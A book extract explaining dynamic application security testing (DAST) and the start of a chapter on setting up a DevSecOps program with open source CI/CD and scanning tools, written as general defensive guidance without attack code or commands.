11 Dynamic Application Security Testing (DAST) Dynamic application security testing (DAST) is a type of security testing that assesses the security of web applications by analyzing them while they are running. This approach evaluates the application from the outside in, simulating real-world attacks and identifying vulnerabilities that can be exploited by hackers. DAST works by sending malicious input to an application and observing how the application responds. This can include sending invalid data to input fields, attempting to bypass authentication mechanisms, and trying to access sensitive data without proper authorization. The tool then analyzes the responses to identify any vulnerabilities or weaknesses in the application’s security. DAST can be used to test a wide range of web applications, including those that are built using programming languages such as Java, .NET, and PHP. The tool can also be used to test applications hosted in various environments, including on-premises, in the cloud, and on mobile devices. In this chapter, we will cover the following topics: • What is DAST? • DAST usage for developers • DAST usage for security testers • The importance of DAST in secure development environments • Comparing DAST with other security testing approaches

What is DAST? DAST is a security testing process that evaluates a running application, typically a web application, in real time to detect vulnerabilities that could be exploited during its operation. Unlike static analysis, which examines application code without executing it, DAST focuses on the application’s behavior

144

Dynamic Application Security Testing (DAST)

and data flow during its operation, often from an outsider’s perspective without visibility into the underlying code. A DAST tool could be used to do the following: • Test for SQL injection vulnerabilities by sending specially crafted input to application forms or URL parameters to see if the app inadvertently executes those inputs as part of a SQL query. If it does, an attacker could potentially access, modify, or delete data from the database. • Check for cross-site scripting (XSS) by attempting to insert malicious scripts into inputs. If successful, when this input is reflected to a user without being properly sanitized, the script can run in the user’s browser, potentially stealing session cookies or performing actions on the user’s behalf. • Test for authentication and session management flaws by trying to bypass login forms, hijack sessions, or escalate privileges. DAST tools would actively probe these areas and others, trying to exploit vulnerabilities as a real attacker might, but to identify and resolve the issues rather than cause harm.

Advantages and limitations of DAST DAST offers several advantages, such as identifying vulnerabilities that only manifest during runtime, including issues related to authentication, session management, data processing, and more. It tests the application in its real-world operating environment and can catch configuration mistakes and deployment errors. Additionally, DAST is not language-dependent, making it versatile for testing diverse applications. However, its limitations include the potential for a high number of false positives, the inability to provide insight into the location of vulnerabilities within the code base, and the potential to miss design-level flaws since it operates without access to the source code. Furthermore, because DAST tests live applications, there’s a risk of disrupting normal operations if not performed cautiously. The following are the advantages of DAST: • DAST can quickly identify vulnerabilities in running applications without access to the source code, making it a valuable tool for testing third-party applications or legacy systems that may not be actively maintained • DAST simulates real-world attacks on an application, providing a more accurate representation of the application’s security posture than other testing methods • DAST can be used to test a wide range of web applications, including those built using various programming languages and hosted in different environments • DAST can identify vulnerabilities that may not be visible from the inside, such as those related to input validation and access control • DAST can be automated to save time and effort in the testing process

What is DAST?

The following are the limitations of DAST: • DAST may produce false positives or miss certain vulnerabilities if the tool is not configured correctly or if the testing environment does not accurately replicate the production environment • DAST may be unable to detect vulnerabilities that are not visible from the outside, such as those related to the application’s code • DAST may be limited in its ability to detect vulnerabilities in applications with architectures, such as single-page applications and those using JavaScript frameworks • DAST relies on standard or legacy web application methods and not dynamic applications, which are used as the norm nowadays • DAST does not provide a complete picture of an application’s security posture and should be used with other security testing methods, such as SAST and IAST

The DAST process DAST is a process for testing the security of a web application in real time by simulating attacks and analyzing the application’s response to them. Here’s an overview of the DAST process: 1. Application setup: The first step is to set up the web application for testing. This involves identifying the application’s components, such as web pages, forms, and input fields, and configuring the DAST tool to access and test them. 2. Test configuration: The DAST tool needs to be configured to simulate attacks on the application. This includes setting up parameters such as the number of requests to send, the type of attacks to perform, and the data to be inputted. 3. Attack simulation: The DAST tool then sends requests to the web application, simulating various types of attacks, such as SQL injection, XSS, and cross-site request forgery (CSRF). 4. Analyze the results: The tool analyzes the application’s response to the simulated attacks and identifies vulnerabilities, such as insecure authentication mechanisms, SQL injection flaws, or insecure session management. 5. Reporting: The final step is to generate a report of the vulnerabilities discovered by the DAST tool. This report provides information about the vulnerabilities and their potential impact on the application and suggests possible remediation actions. Overall, the DAST process helps identify security vulnerabilities in a web application and provides remediation guidance. It is an essential component of any comprehensive application security program.

145

146

Dynamic Application Security Testing (DAST)

DAST usage for developers Developers play an essential role in building secure applications, and DAST can be a crucial tool in their arsenal. Here’s a detailed guide on how developers can leverage DAST, automate its usage, and innovate with the resulting automation. Integrating DAST into the development process helps not only in identifying and mitigating vulnerabilities but also in fostering a culture of security awareness among developers. The automation capabilities of DAST tools mean developers can innovate, ensuring applications are robust and secure from the earliest stages of development. Let’s discuss the aspects that can be part of the DevSecOps pipeline for developers: Integration into the SDLC: • Continuous integration (CI): Developers can integrate DAST tools into their CI pipelines. After every code commit, the DAST tool can automatically scan the running application and provide feedback. This ensures that any vulnerabilities introduced during development are caught early. • Continuous deployment (CD): Before pushing updates to development, UAT, or pre-production and production environments, the CD process can trigger a DAST scan to ensure no security issues are present. Feedback loop: • Developers get instant feedback about the security posture of their applications, allowing them to address vulnerabilities as they are found, instead of after the application is in production. This short feedback loop can lead to better coding practices over time. Automating routine checks: • Routine checks for common vulnerabilities, such as XSS, SQL injection, and CSRF, can be automated using DAST tools Custom scripts and checks: • Some DAST tools allow developers to write custom scripts or checks. This means developers can tailor the tool to the unique aspects of their application, ensuring thorough and precise scanning. Innovating with automation: • API testing: As more applications rely on APIs, developers can use DAST tools to test API endpoints, ensuring they’re secure against potential threats. • Integration with threat intelligence: Developers can integrate DAST tools with threat intelligence platforms. This ensures the application is tested against the latest known vulnerabilities and threats.

DAST usage for security testers

• Interactive application security testing (IAST): Developers can combine DAST with IAST (a method that involves instrumenting the application to monitor its behavior). This combination provides both external and internal views of potential security issues. Enhanced collaboration: • Security teams can foster a collaborative environment, bridging the gap between development and security. This ensures that security becomes an integral part of the development process, rather than an afterthought. Training and skill development: • As developers use DAST tools, they can gain a deeper understanding of the vulnerabilities they’re testing for, fostering a sense of curiosity and further skill development. Over time, this can lead to writing more secure code from the outset.

DAST usage for security testers Security testers play a pivotal role in safeguarding applications against vulnerabilities. With the dynamic nature of web applications, testers must employ DAST to stay a step ahead. Let’s explore how security testers can leverage DAST, automate its processes, and innovate using its automation capabilities. For security testers, DAST provides a powerful means to scan applications in their active environment. The automation capabilities of DAST tools allow for efficiency, thoroughness, and adaptability in testing processes, ensuring that security testing remains effective in the face of evolving threats. By innovating with automation, security testers can ensure a proactive approach to application security, making it an integral part of the SDLC. Let’s understand it in detail: • Comprehensive vulnerability discovery: ‚ Real-world scenarios: DAST allows security testers to evaluate applications in real time, simulating genuine attack scenarios that static testing might miss. It helps in uncovering flaws present during the application’s active state. ‚ Coverage: Security testers can identify vulnerabilities across various aspects, such as authentication, session management, data processing, and more. • Automation in testing: ‚ Scheduled scans: Security testers can automate DAST scans at regular intervals or specific stages in the SDLC, ensuring continuous monitoring and timely vulnerability detection. ‚ Integrated testing environment: DAST can be integrated with other tools and platforms, creating an automated testing ecosystem. This can include CI/CD pipelines, bug-tracking tools, and more.

147

148

Dynamic Application Security Testing (DAST)

• Innovative automation opportunities: ‚ Baseline scans: Security testers can establish a baseline for applications by running regular DAST scans, identifying any deviations or newly introduced vulnerabilities promptly ‚ Parameterized scans: Advanced DAST tools allow for parameterization, letting testers customize scans based on specific application components or functionality ‚ Real-time alerts: With the right setup, DAST tools can provide real-time alerts, allowing testers to act swiftly on high-risk vulnerabilities ‚ Integration with other security tools: Security testers can merge results from DAST with other testing tools, such as SAST or IAST, to get a comprehensive view of application security • Enhancing test depth with custom scripts: ‚ Most advanced DAST tools allow for custom scripts. This flexibility enables security testers to tailor tests for specific application behaviors or emerging threats. • Collaboration and reporting: ‚ Security testers can share DAST results with developers and other stakeholders as part of the process via the available toolsets. Detailed reports can pinpoint vulnerability locations and recommend remediation steps, fostering an environment of collaboration. ‚ Visualization features in many DAST tools can help in representing vulnerabilities in graphical formats, making it easier for non-technical stakeholders to grasp the security posture. • Continuous learning and adaptation: ‚ The dynamic nature of DAST tools allows security testers to keep pace with the evolving threat landscape. As new attack vectors emerge, testers can adjust DAST configurations, ensuring that scans remain relevant and effective. ‚ By working with DAST, security testers can gain insights into the latest attack methodologies and defenses, further honing their skills.

The importance of DAST in secure development environments Incorporating DAST into the application development life cycle is essential to ensure that security is integrated into the entire process. Developers can address vulnerabilities promptly, reducing the risk of a security breach and minimizing the cost of remediation.

The importance of DAST in secure development environments

Incorporating DAST into the application development life cycle • Integrate DAST early in the development process to identify and remediate vulnerabilities before they reach production. This proactive approach reduces the risk of security breaches and minimizes the cost of fixing vulnerabilities. • Schedule regular DAST scans throughout the SDLC to ensure that new vulnerabilities are detected and addressed promptly. • Include DAST as part of your CI/CD pipeline to automate security testing and ensure that vulnerabilities are detected and addressed during the development process. • Automating DAST scans can help ensure that testing is performed consistently and promptly. This can be achieved by integrating DAST into the CI/CD pipeline or by using automated testing tools that can be scheduled to run regularly. Automating DAST scans can help reduce the workload on developers and testers and ensure that testing is performed consistently across all applications. • Automate DAST scans to run on a regular schedule or as part of the CI/CD pipeline. This helps ensure that security testing is performed consistently and is up to date. • Define and customize scan policies to focus on the most relevant threats and reduce false positives. Automated scans should be configured to target specific application components, technologies, and known vulnerabilities. • Automate the integration of DAST results with other security tools and processes, such as vulnerability management platforms, Security Information and Event Management (SIEM) systems, and threat intelligence feeds. Identifying and prioritizing vulnerabilities is essential to ensure that the most critical vulnerabilities are addressed first. This can be achieved by using DAST reports to identify vulnerabilities and assigning a severity level to each vulnerability based on its potential impact on the application. High-severity vulnerabilities should be addressed first, followed by medium and low-severity vulnerabilities: • Identifying and prioritizing vulnerabilities: ‚ Risk-based prioritization: Evaluate and prioritize vulnerabilities based on factors such as their severity, potential impact, and exploitability. Focus on addressing the most critical vulnerabilities first. ‚ Validating findings: Manually review the results of automated DAST scans to validate the findings and address any discrepancies, such as false positives or false negatives. • Collaborating with developers and security teams: Collaborating with developers and security teams is essential to ensure that vulnerabilities are addressed in a timely and effective manner. This can be achieved by sharing DAST reports with

149

150

Dynamic Application Security Testing (DAST)

developers and security teams, holding regular meetings to discuss the progress of remediation efforts, and providing training and guidance on best practices for secure application development: ‚ Foster a security culture: Encourage collaboration between development, security, and operations teams to ensure that security concerns are addressed throughout the SDLC. ‚ Training and awareness: Provide developers with training on secure coding practices and educate them on the importance of application security. This helps ensure that security is considered at every stage of the development process. ‚ Clear communication: Communicate DAST findings in a clear and actionable manner, providing developers with the information they need to understand and remediate vulnerabilities. By following these best practices, organizations can ensure that their applications are secure and free from vulnerabilities, reducing the risk of a security breach and protecting their business operations.

Advanced DAST techniques In addition to the basic concepts and best practices for DAST, several advanced techniques can be used to enhance the effectiveness of the testing. In this section, I will cover some of these techniques, including fuzz testing, authentication testing, API testing, and mobile application testing: • Fuzz testing: Fuzz testing, also known as fuzzing, is a technique that involves sending random or malformed input data to an application to test how it responds. This technique is used to identify vulnerabilities such as buffer overflows, injection attacks, and format string vulnerabilities. Fuzz testing can be done manually or with the help of automated tools. DAST tools, such as Burp Suite, OWASP ZAP, and Acunetix, include fuzz testing capabilities. • Authentication testing: Authentication testing involves testing an application’s authentication and authorization mechanisms to ensure that they are secure and effective. This includes testing for weak passwords, session fixation, and authentication bypass vulnerabilities. Authentication testing can be done manually or with the help of automated tools. Some DAST tools, such as Netsparker, include authentication testing capabilities. • API testing: API testing involves testing the APIs that are used to interact with an application. API testing can be done manually or with the help of automated tools. Some DAST tools, such as Postman and SoapUI, include API testing capabilities. API testing involves assessing the security of the application’s APIs, which often serve as a critical communication channel between different components and services.

The importance of DAST in secure development environments

We can perform API testing by keeping the following things in mind: ‚ Input validation: Test for vulnerabilities such as SQL injection, XSS, and remote code execution by sending malicious input data to the API endpoints ‚ Access controls: Verify that proper access controls are in place to prevent unauthorized access to sensitive API endpoints and data ‚ Rate limiting: Check if the API has rate limiting to prevent Denial-of-Service (DoS) attacks • Mobile application testing: Mobile application testing involves testing the security of mobile applications on various platforms, such as iOS and Android. Mobile application testing can be done manually or with the help of automated tools. Some DAST tools, such as AppScan and Mobile Security Framework (MobSF), include mobile application testing capabilities. Mobile application testing assesses the security of applications running on mobile devices such as smartphones and tablets: ‚ Data storage: Test for insecure data storage practices, such as storing sensitive data in plain text or easily accessible locations ‚ Communication security: Verify the proper implementation of secure communication channels, such as SSL/TLS, to protect data in transit between the mobile application and its backend services ‚ Reverse engineering: Assess the application’s resilience to reverse engineering and code tampering by checking for obfuscation techniques and proper signing of the application package These advanced techniques can be used to enhance the effectiveness of DAST testing. Organizations can use these techniques to identify and mitigate vulnerabilities that traditional testing methods may miss. It is important to incorporate these techniques as part of a broader security testing program that includes other types of testing, such as SAST and manual testing, to ensure comprehensive application security.

Choosing the right DAST tool Choosing the right DAST tool is the first and most important step in setting up a DAST environment. Many DAST tools are available in the market, and choosing the right one can be daunting. The choice of tool will depend on various factors, such as cost, ease of use, features, and the type of web application being tested. Some popular DAST tools include Burp Suite, OWASP ZAP, Acunetix, and Netsparker. When selecting a DAST tool, consider the following factors: • Support for the programming language and frameworks used in the web application • Ease of use and customization

151

152

Dynamic Application Security Testing (DAST)

• Reporting and analysis capabilities • Integration with other security tools and workflows • Licensing and cost • Setting up the testing environment Before you can start DAST testing, setting up the testing environment to ensure accurate and effective testing is essential. The following are the steps for setting up a testing environment: 1. Identify the target web application(s) that need to be tested. 2. Clone the web application(s) onto a test server or virtual machine. 3. Configure the web application(s) to use a test database to avoid any impact on the production environment. 4. Install and configure any necessary dependencies and libraries. 5. Ensure that the web application(s) are accessible from the DAST tool. 6. Configure the DAST tool for results.

How to perform a DAST scan in an organization To perform a DAST scan in an organization, you should first select a DAST tool that’s suitable for the specific application type. With that tool in hand, the next step involves setting up a controlled environment that mirrors the production system to ensure no disruptions occur during testing. It’s essential to configure the DAST tool based on the organization’s needs, ensuring it understands the application’s structure and scope. Once set up, initiate the scan, allowing the tool to actively probe the application for vulnerabilities. Upon completion, review the results, paying close attention to potential false positives. Prioritize the identified vulnerabilities based on their severity and potential impact, then collaborate with development teams to patch the flaws. Lastly, re-scan the application post-remediation to confirm that the identified vulnerabilities have been addressed. Let’s take a closer look at this: • Setting up a DAST environment DAST is a critical component of modern web application security. It allows organizations to test the security of their web applications by simulating attacks against them in a controlled environment. Setting up a DAST environment involves selecting the right tool, configuring it for optimal performance, and setting up the testing environment: ‚ Choose a suitable environment: To effectively run DAST, choose an environment that closely mirrors your production environment. This will help you identify security vulnerabilities that may be present in the live system. The environment should include the application, its dependencies, and any related infrastructure components (such as databases, web servers, and APIs).

The importance of DAST in secure development environments

‚ Isolate the testing environment: It is essential to isolate the testing environment from the production environment to avoid any accidental harm or data leakage. Create separate networks, access controls, and user accounts for the testing environment. ‚ Prepare test data: Prepare realistic test data that resembles production data but without sensitive information. The test data should cover various data types, input fields, and possible user interactions. • Once the testing environment has been set up, the DAST tool must be configured for optimal performance. This includes setting up the scan policies, authentication, and configuring any custom plugins that may be required. The scan policies determine the scope of the testing and the types of vulnerabilities that the tool will look for. Authentication is required to ensure that the tool can access all the parts of the application that require testing. • After the DAST tool has been configured, it is time to run the scan. It is important to ensure that the scan is run with the appropriate settings and configurations. The scan should cover all parts of the application that are in scope, and the tool should be allowed to run for a sufficient amount of time to ensure that it can detect all possible vulnerabilities. • After the scan is complete, the results need to be analyzed. The DAST tool will generate a report listing all the detected vulnerabilities. It is important to review the report carefully to understand the severity of each vulnerability and prioritize them based on their impact on the application. Once the vulnerabilities have been prioritized, they can be addressed and fixed. • Setting up a DAST environment involves choosing the right DAST tool, setting up the testing environment, configuring the DAST tool for optimal performance, running the scan, and analyzing the results. Each of these steps is important to ensure that the DAST tool can detect all possible vulnerabilities in the web application. • Understanding false positives and false negatives.

Integrating DAST with other security tools Integrating DAST with other security tools is essential to ensure comprehensive application security. In this section, I will cover the benefits of using DAST with other security testing tools, incorporating DAST into DevOps processes, and analyzing and correlating DAST results with other security data sources. DAST is one of several security testing tools that can be used to identify vulnerabilities in applications. By combining DAST with other testing tools, such as SAST, manual testing, and penetration testing, organizations can improve the accuracy and effectiveness of their security testing program: • SAST: SAST focuses on analyzing an application’s source code, bytecode, or binary code for potential vulnerabilities. Combining SAST and DAST can help identify vulnerabilities that might be missed by either technique alone.

153

154

Dynamic Application Security Testing (DAST)

• IAST: IAST combines aspects of both SAST and DAST by monitoring an application’s behavior during runtime and analyzing its code. Using DAST with IAST can improve the accuracy of vulnerability detection. • Runtime application self-protection (RASP): RASP is a security technology that monitors an application during runtime to identify and block potential attacks. Integrating DAST with RASP can help with identifying vulnerabilities and protecting your application in real time.

Incorporating DAST into DevOps processes DevOps processes are designed to enable organizations to develop, deploy, and maintain applications quickly and efficiently. By incorporating DAST into DevOps processes, organizations can ensure that security is integrated into the entire application development life cycle. This can be achieved by including DAST as part of the automated testing process and integrating DAST results into the CI/CD pipeline.

Analyzing and correlating DAST results with other security data sources DAST results can provide valuable insights into the security of an application. By analyzing and correlating DAST results with other security data sources, such as network traffic logs, system logs, and vulnerability scanners, organizations can gain a more comprehensive understanding of the security posture of their applications. This can help with identifying trends and patterns that indicate potential security risks, enabling organizations to address them proactively: • SIEM systems: Integrate DAST results with your SIEM system to correlate vulnerability data with other security events, helping to prioritize and address the most critical issues • Vulnerability management platforms: Import DAST results into a vulnerability management platform to manage and track the progress of vulnerability remediation efforts • Threat intelligence: Combine DAST results with threat intelligence data to better understand the potential impact of identified vulnerabilities and assess the risk they pose to your organization By using DAST in combination with other testing tools, incorporating DAST into DevOps processes, and analyzing and correlating DAST results with other security data sources, organizations can improve the accuracy and effectiveness of their security testing program and ensure that security is integrated into the entire application development life cycle.

DAST reporting and remediation Generating DAST reports is a critical component of any DAST testing program. In this section, I will cover the importance of identifying vulnerabilities early in the development process, prioritizing and remediating vulnerabilities, verifying remediation, and retesting to ensure that the application is secure.

The importance of DAST in secure development environments

Generating DAST reports • Execute scans: Run DAST scans as part of your development process or on a regular schedule. Cover the entire application, including its dependencies and all relevant components. • Compile results: Aggregate the results of the DAST scans to generate a comprehensive report. Include information such as the vulnerability type, severity, location, and a description of the potential impact. • Review and validate findings: Manually review the DAST report to validate the findings, as automated scans may generate false positives or negatives. Make sure you address any discrepancies before proceeding.

Identifying vulnerabilities early in the development process Identifying vulnerabilities early in the development process is crucial to ensure that they can be remediated before the application is released to production. DAST testing should be performed early in the development process, as part of the testing process for each new release or feature. This will enable developers to address vulnerabilities promptly, reducing the risk of a security breach and minimizing the cost of remediation: • Shift-left approach: Integrate DAST into your development process by including it in your CI/CD pipeline. This helps identify vulnerabilities early in the development life cycle, allowing for faster remediation. • Collaborative environment: Encourage collaboration between development, security, and operations teams to ensure that security concerns are addressed throughout the development life cycle.

Prioritizing and remediating vulnerabilities Once vulnerabilities have been identified, they should be prioritized based on their severity and the potential impact on the application. High-severity vulnerabilities should be remediated first, followed by medium and low-severity vulnerabilities. The remediation process should be documented, and progress should be tracked to ensure that all vulnerabilities are addressed.

Verifying remediation After the vulnerabilities have been remediated, it is important to verify that the remediation has been effective. This can be done through manual testing or with the help of automated tools. Once the remediation process has been verified, the application can move on to the next stage of the development process: • Verify fixes: Once a vulnerability has been remediated, verify that the issue has been resolved by reviewing the changes in the application’s code or configuration.

155

156

Dynamic Application Security Testing (DAST)

• Retest: Perform follow-up DAST scans to confirm that the vulnerabilities have been effectively addressed. Retesting helps ensure that no new vulnerabilities have been introduced during the remediation process. • Update reports: Update your DAST reports to reflect the current state of the application’s security posture. Maintain a history of past reports to track improvements and changes over time.

Retesting Retesting is essential to ensure that the application is secure and free from vulnerabilities. Once the remediation process has been verified, the application should be retested using DAST and other testing tools to ensure that no new vulnerabilities have been introduced. Retesting should be performed as part of the testing process for each new release or feature.

Generating DAST reports DAST reports should be generated after each testing cycle to document the vulnerabilities that were identified, the severity of each vulnerability, and the status of the remediation efforts. These reports should be shared with the development team and other stakeholders to ensure that everyone is aware of the security posture of the application and the progress of the remediation efforts. In conclusion, generating DAST reports is an important component of any DAST testing program. By identifying vulnerabilities early in the development process, prioritizing and remediating vulnerabilities, verifying remediation, and retesting, organizations can ensure that their applications are secure and free from vulnerabilities. DAST reports should be generated after each testing cycle to document the progress of the remediation efforts and ensure that everyone is aware of the security posture of the application.

Comparing DAST with other security testing approaches There are several different approaches to application security testing, each with its strengths and weaknesses. In this section, we’ll compare DAST with other security testing approaches.

SAST SAST is the process of analyzing the application’s source code to identify security vulnerabilities. Unlike DAST, which tests the application in a running state, SAST examines the application’s code and can detect vulnerabilities that may not be visible during runtime. However, SAST is limited by its inability to detect vulnerabilities that arise from user input or environmental factors.

IAST IAST utilizes and combines the best features of SAST and DAST. IAST monitors the application during runtime and analyzes its behavior to detect vulnerabilities in real time. It also examines the application’s

Comparing DAST with other security testing approaches

source code to detect vulnerabilities that may not be visible during runtime. However, IAST can be complex to set up and may require making modifications to the application code.

RASP RASP is a security approach that uses runtime monitoring and automated protection mechanisms to detect and prevent attacks in real time. RASP integrates with the application and can detect vulnerabilities that other testing approaches may miss. However, RASP may be limited by its inability to detect vulnerabilities before an attack occurs. Each security testing approach has its benefits and drawbacks, and a comprehensive application security program should use a combination of these approaches to identify and mitigate security risks. DAST is particularly useful for identifying vulnerabilities that arise from user input and environmental factors and can be a valuable component of an overall security testing strategy.

The future of DAST The future of DAST is promising, with emerging trends in technology and advancements in artificial intelligence and machine learning that are likely to impact the cybersecurity industry significantly. Let’s take a closer look: • Emerging trends in DAST technology: DAST tools are becoming more sophisticated and are incorporating new features, such as machine learning and artificial intelligence, to improve their effectiveness. Some DAST tools can now identify vulnerabilities automatically and suggest remediation actions, reducing the time and effort required for manual analysis. Additionally, DAST tools are becoming more integrated with security testing approaches, such as SAST and IAST, to provide a more comprehensive testing solution. • Advancements in artificial intelligence and machine learning: Artificial intelligence and machine learning are becoming increasingly important in cybersecurity, and DAST is no exception. These technologies can improve vulnerability detection accuracy, reduce false positives, and speed up the remediation process. Machine learning algorithms can also learn from previous testing results to improve the testing process and identify new vulnerabilities that may not have been previously detected. • The potential impact of DAST on the cybersecurity industry: DAST is already a valuable tool in the cybersecurity industry, and its importance is likely to increase in the coming years. As the number of web applications grows, effective application security testing solutions will become more critical. DAST can help organizations identify vulnerabilities in real time and proactively address them, reducing the risk of data breaches and other cyberattacks. Additionally, as the regulatory landscape continues to evolve, compliance requirements will likely increase, and DAST can help organizations meet these requirements.

157

158

Dynamic Application Security Testing (DAST)

DAST will likely remain a critical component of the cybersecurity industry in the coming years. Its continued development and integration with other technologies will improve its effectiveness and help organizations avoid emerging threats.

Summary DAST is crucial to any comprehensive application security program. DAST tools simulate attacks against web applications to identify vulnerabilities and weaknesses that attackers can exploit. Let’s recap the DAST concepts and best practices: • Set up a suitable, isolated testing environment that closely mirrors your production environment • Choose the right DAST tool based on your application’s architecture, technology stack, and specific security concerns • Configure the DAST tool for optimal performance by customizing scan policies, setting up authentication and authorization, and integrating with CI/CD pipelines • Monitor and analyze the results to address identified vulnerabilities and track the progress of your security efforts It is important to note that ongoing application security testing is essential to ensure that web applications are secure and free from vulnerabilities. DAST should be performed regularly and as part of a broader security testing program that includes other types of testing, such as SAST and manual testing. In today’s world, where cyber threats are becoming increasingly sophisticated and frequent, organizations must implement DAST as part of their security strategy. DAST can help identify vulnerabilities before attackers can exploit them, minimizing the risk of a security breach and the associated financial and reputational damage. By taking proactive measures to secure their web applications, organizations can ensure the safety of their customers’ data and protect their business operations. We will cover this in more detail in the next chapter.

Part 4: Tools Tools help in the execution of an effective DevSecOps program. This section covers tools and tips to set up an effective DevSecOps program, covering it from all angles. This part has the following chapter: • Chapter 12, Setting Up a DevSecOps Program with Open Source Tools

12 Setting Up a DevSecOps Program with Open Source Tools ​​Creating a DevSecOps program using open source tools can be a cost-effective solution for many organizations. It requires a combination of practices, tools, and cultural philosophies to ensure security is integrated into the development life cycle. In this process, remember to continuously review and update your DevSecOps program to keep up with evolving security threats and to adopt new and improved open source tools as they become available. We can approach setting up a DevSecOps program with open source tools by following these steps. This is an exhaustive list of things that can be covered as part of setting up a DevSecOps program: • Culture and training: Foster a culture of shared responsibility for security across your development, security, and operations teams. Conduct ongoing training to ensure all team members have the requisite knowledge to contribute to security. • Version control: Adopt version control systems such as Git to track changes and ensure a collaborative environment for code development. • Continuous integration (CI): Implement CI systems such as Jenkins, CircleCI, or GitHub Actions to automate the integration of code changes from multiple contributors. Integrate security scans into your CI pipeline using open source tools such as OWASP DependencyCheck for checking third-party dependencies for vulnerabilities. • Continuous deployment (CD): Implement CD tools such as Jenkins or Spinnaker to automate the deployment of applications. Include automated security checks in your deployment pipeline, such as configuration scanning and security testing.

162

Setting Up a DevSecOps Program with Open Source Tools

• Infrastructure as Code (IaC): Use IaC tools such as Terraform or Ansible to manage your infrastructure, ensuring that it is defined and managed through code. Apply security best practices to your IaC configurations and use open source tools such as Checkov or Terrascan to scan for misconfigurations. • Container and orchestration security: If you are using containers, employ tools such as Docker Swarm and Kubernetes for orchestration. Use open source security tools such as Trivy or Clair for container scanning and kube-bench or kube-hunter for Kubernetes security assessments. • Monitoring and logging: Implement centralized logging and monitoring using open source tools such as the ELK Stack (Elasticsearch, Logstash, Kibana) or Prometheus and Grafana. • Incident response: Establish an incident response plan and procedures. Use open source tools such as TheHive or Wazuh for incident management and orchestration. • Compliance and auditing: Ensure that your DevSecOps processes and tools comply with relevant industry standards and regulations. Utilize open source auditing and compliance tools such as OpenSCAP or Inspec. • Feedback loop: Establish a feedback loop to ensure that lessons learned from security incidents are integrated back into the DevSecOps process, helping to continuously improve your security posture. In this chapter, we will cover these aspects in the following topics: • Techniques used in setting up the program • Setting up the CI/CD pipeline • Implementing security controls • Managing DevSecOps in production • The benefits of the program

Techniques used in setting up the program Let’s start by understanding the techniques that can be used in setting up the program. We will start by understanding DevSecOps.

Understanding DevSecOps DevSecOps expands on the mindset established by DevOps, which is a set of cultural philosophies, practices, and tools that encourage faster and more agile software development through collaboration between development and operations teams.

Techniques used in setting up the program

The adoption of a DevSecOps culture requires a holistic approach and a commitment to continuous improvement to ensure that security is integrated effectively into the development life cycle, ultimately leading to more secure and reliable software delivery. At its core, DevSecOps means integrating security into every step of the development process. It’s a cultural shift, ensuring that security is everyone’s responsibility. Let’s deep dive into understanding DevSecOps.

Cultural shift DevSecOps fosters a culture where security is not seen as someone else’s job, but a shared responsibility. Every member of the team, whether they’re a developer, tester, or operations personnel, is accountable for the security of the application. Unlike traditional models where security was often considered at the later stages of development, DevSecOps ensures that security is a consideration from the get-go, starting with the initial design phase.

Practical implementation DevSecOps emphasizes the automation of security processes to identify and fix security issues faster and earlier in the development life cycle. This includes automated security testing, vulnerability scanning, and automated deployments with built-in security checks. It also encourages continuous monitoring and logging to provide visibility into the security posture of applications and infrastructure, making it easier to detect and respond to security incidents.

Tooling Utilize tools that can integrate with development, deployment, and monitoring platforms to provide continuous feedback on the security posture of applications. As discussed earlier, there are numerous open source tools available that can be employed to implement various aspects of a DevSecOps program.

Benefits By integrating security checks early and throughout the development life cycle, teams can detect and remediate security issues much earlier than traditional models. Faster feedback and automated processes reduce the time required to remediate vulnerabilities and security issues. Continuous monitoring and auditing help in maintaining compliance with security standards and regulations.

163

164

Setting Up a DevSecOps Program with Open Source Tools

Challenges There might be resistance initially as this approach requires a change in mindset and practices across different teams. Team members may need to learn new skills and tools to effectively contribute to the security aspects of the DevSecOps pipeline.

Continuous improvement Establishing feedback loops to learn from security incidents and continuously improving security practices is crucial for the success of a DevSecOps program.

Setting up the CI/CD pipeline Use Jenkins or GitLab CI/CD as your CI/CD tool. These are popular open source tools that can automate the process of building, testing, and deploying your applications. Here are the stages where these tools can help: • Source code management: Git is the most commonly used open source tool. Platforms such as GitHub and GitLab provide added features such as pull requests, issues, and CI/CD integrations. • Static Application Security Testing (SAST): Use tools such as Brakeman (Ruby on Rails), Bandit (Python), or SonarQube to detect vulnerabilities in your source code. • Dynamic Application Security Testing (DAST): Tools such as OWASP ZAP or Arachni can identify vulnerabilities at runtime by scanning your running application. • Container security: If you’re using Docker, tools such as Clair, Anchore, or Trivy can scan your containers for known vulnerabilities. • Dependency scanning: Check for vulnerabilities in your project’s dependencies using tools such as OWASP Dependency-Check or Snyk. • IaC security: If you use Terraform, CloudFormation, or similar tools, check out tools such as Checkov or KICS to scan for misconfigurations. • Secrets management: Avoid hardcoding secrets in your code. Use tools such as Vault by HashiCorp for managing secrets. • Compliance as code: Use tools such as Open Policy Agent (OPA) to enforce policies across your stack.

Setting up the CI/CD pipeline

The technicalities of setting up a CI/CD pipeline Let’s get into the technical details of how the tools can be set up when using CI/CD.

Pre-setup • Version control setup: Ensure you have a version control system in place, such as Git, and that your code is hosted on platforms such as GitHub, GitLab, and Bitbucket. • Infrastructure preparation: Prepare the infrastructure where your application will be deployed. This could be on-premises servers or cloud platforms such as AWS, Azure, and GCP. • Access controls: Set up the necessary access controls and permissions for your CI/CD tools and target environments to ensure security.

Option 1 – Jenkins • Installation and configuration: ‚ Install Jenkins on a server ‚ Configure Jenkins, adding the necessary plugins, setting up executors, and defining environmental variables • Pipeline creation: ‚ Create a Jenkinsfile that defines your pipeline stages, such as build, test, and deploy ‚ Set up webhook triggers from your version control system to initiate the pipeline on code changes • Security integration: ‚ Integrate security scanning tools into your pipeline stages to ensure code and dependencies are scanned for vulnerabilities

Option 2 – GitLab CI/CD CI/CD configuration: • In your project repository in GitLab, create a .gitlab-ci.yml file that defines the pipeline stages • Utilize the integrated CI/CD feature of GitLab to set up your pipelines Security integration: • Utilize GitLab’s built-in security features or integrate external security scanning tools in your pipeline stages

165

166

Setting Up a DevSecOps Program with Open Source Tools

Option 3 – Travis CI CI/CD configuration: • In your project repository on GitHub, create a .travis.yml file that defines the pipeline stages • Configure Travis CI through its web UI to set up your pipelines Security integration: • Integrate security scanning tools into your pipeline stages to ensure code and dependencies are scanned for vulnerabilities

